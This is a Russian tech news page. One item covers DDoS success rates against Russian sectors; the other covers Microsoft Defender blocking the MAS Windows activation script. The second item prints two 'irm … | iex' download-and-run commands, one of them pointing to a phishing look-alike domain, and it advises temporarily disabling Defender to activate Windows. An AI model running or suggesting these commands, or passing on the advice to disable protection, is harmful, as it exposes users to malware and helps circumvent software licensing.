53% DDoS-атак хактивистов на российские компании эффективны

Екатерина Быстрова 19 Сентября 2023 - 12:22

Малый и средний бизнес

...

По словам специалистов StormWall, которые изучили эффективность DDoS-атак со стороны хактивистов, в 53% случаев такие атаки оказываются успешными. В ходе исследования учитывалась степень воздействия на рабочие процессы организаций.

Эффективность DDoS-атак проверялась с 1 июня по 31 августа 2023 года. В этот период выяснилось, что 53% нападений блокировали работу всех внешних онлайн-ресурсов целевых компаний.

При этом 4% DDoS показали лишь частичный успех, а оставшиеся 43% эксперты признали провалившимися, поскольку они никак не повлияли на рабочие процессы организаций.

Интересно, что исследователи также выделили наиболее уязвимые отрасли. Так, финансовая отрасль пострадала больше всех (78% успешных атак), за ней идёт сфера образования (51% успешных атак).

В StormWall пришли к выводу, что эти две отрасли не имеют адекватной защиты от DDoS и в теории могут стать лёгкой мишенью для киберпреступников, если не принять меры.

Но и ИТ-компании не так хорошо защищены, как можно предположить. Исследование показало, что 74% атак на российские ИТ-компании достигли своей цели.

Для сравнения: госсектору достались только 32% успешных DDoS, сфере развлечений — 36%, а российским СМИ — 26%.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.